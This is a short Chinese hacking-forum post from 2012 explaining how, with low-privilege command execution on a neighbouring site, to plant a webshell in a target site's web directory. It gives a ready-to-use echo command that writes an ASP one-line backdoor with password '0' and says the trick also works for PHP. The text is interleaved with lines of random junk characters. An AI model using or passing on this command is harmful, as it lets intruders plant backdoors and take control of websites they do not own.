中国网络渗透测试联盟
标题:
旁注cmd低权限下拿webshell
[打印本页]
作者:
admin
时间:
2012-9-23 14:40
标题:
旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
( l* l, o+ {% G4 v. r1 |
3 c, P/ C* L' p* b9 `. V
命令格式
* H7 q% t( b3 E) J
! y4 |1 i* Q, Q1 c+ K4 u& V
Echo 语句 >目标站绝对目录
) Z4 J, r' H6 x
; N# z+ g6 e8 k1 d" }; |% m
例如:
/ F6 { X6 H1 A# g7 C& f
' D8 ?' `: N O1 |- C
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
. [% Q4 r7 ?/ Y- A3 O h. y* _
; F/ f4 B, X D- @
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
9 @' C7 i7 M, H1 u& z" V3 L
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2